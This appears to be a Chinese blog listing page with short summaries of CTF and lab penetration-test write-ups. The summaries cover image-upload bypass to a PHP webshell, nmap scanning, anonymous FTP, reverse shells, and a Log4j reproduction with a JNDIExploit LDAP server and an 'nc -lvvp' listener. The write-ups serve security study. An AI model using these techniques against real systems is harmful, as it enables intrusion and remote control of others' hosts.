摘要: 进入题目 注册账号登陆后 点击头像 发现可以上传图片 上传正常图片bp抓包 发现为jpeg类型且base64加密 修改为php类型 知道文件上传路径 蚁剑连接 得到flag 阅读全文
posted @ 2024-07-07 13:42 vзn0m 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 进入题目 没刷新一次数字改变一次 直接上脚本 注意正则表达式 得到flag 阅读全文
posted @ 2024-07-07 13:41 vзn0m 阅读(2) 评论(0) 推荐(0) 编辑
摘要: 环境搭建 拿到靶场有5台机子,配置网段,仅主机模式网段vmnet2网段为192.168.93.0即可,出网网卡设置为桥接即可,点击继续运行即可 注意的是web机的两台linux开启后记得拍快照,web机隔一段时间web服务会出问题 web渗透 主机发现(我的桥接网段是192.168.1.0) nam 阅读全文
posted @ 2024-06-17 23:05 vзn0m 阅读(6) 评论(0) 推荐(0) 编辑
摘要: 靶机搭建 下载靶机配置ip与攻击机在同一网段即可 web渗透 主机发现ip扫描 nmap -sP 192.168.11.0/24 端口服务探测 nmap -A -p 1-65535 192.168.11.8 发现有http服务及公用的ftp共享 ftp连接 ftp anonymous@192.168 阅读全文
posted @ 2024-06-05 00:21 vзn0m 阅读(2) 评论(0) 推荐(0) 编辑
摘要: 环境搭建 配置ip,web机有两张网卡,我对nat设置为192.168.11.0网段,仅主机为192.168.52.0网段,这三台机子都要改一下ip,官方给出要恢复快照3,恢复的时候有问题,不用恢复没有影响 web机的网络情况如下就可以了 在这个目录下启动weblogic服务,以管理员身份运行sta 阅读全文
posted @ 2024-06-03 22:44 vзn0m 阅读(14) 评论(0) 推荐(0) 编辑
摘要: 环境搭建 对web机添加两张网卡 一张nat(web机默认为内网网段),另一张桥接为出网网卡 也可nat+仅主机但是网络环境问题多 这样环境就搭好了 重启修改密码,启动phpstudy web渗透 扫描ip nmap -sP 192.168.1.0/24 得到192.168.1.9等,7为kali机 阅读全文
posted @ 2024-06-02 17:08 vзn0m 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 虚拟机配置 将靶机和攻击机放在同一网段下即可 web渗透 ip扫描 nmap -sP 192.168.11.0/24 得到ip ip:192.168.11.6 详细扫描 nmap -A 192.168.11.6 -p 0-65535 得到22,80,81端口 探测web,81端口是一个登录弹窗 目录 阅读全文
posted @ 2024-04-16 23:48 vзn0m 阅读(8) 评论(0) 推荐(0) 编辑
摘要: 虚拟机配置 将靶机和攻击机放在同一网段下即可 web渗透 扫描ip nmap -sP 192.168.11.0/24 详细扫描 nmap -A 192.168.11.102 -p 0-65535 探测80端口 右键查看源码,得到一个brainfuck编码 解码得到.2uqPEfj3D<P'a-3猜测 阅读全文
posted @ 2024-04-16 23:31 vзn0m 阅读(2) 评论(0) 推荐(0) 编辑
摘要: 虚拟机配置 将攻击机和靶机放在同一网段下即可 web渗透 IP扫描 nmap -sP 192.168.11.0/24 详细扫描 nmap -A 192.168.11.42 探测web网站 发现一可执行命令的地方, 写入一句话木马,用蚁剑链接 链接成功 用蚁剑写文件,反弹链接,注意只有443端口出网 阅读全文
posted @ 2024-04-14 23:23 vзn0m 阅读(2) 评论(0) 推荐(0) 编辑
摘要: Log4j复现 进入题目 在vps上启动一个简易的ldap服务,用JNDIExploit脚本 vps启动服务 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip -l 1389 -p 8180 在开一个会话监听端口 nc -lvvp 4567 构造脚本注入 阅读全文
posted @ 2024-04-12 01:58 vзn0m 阅读(4) 评论(0) 推荐(0) 编辑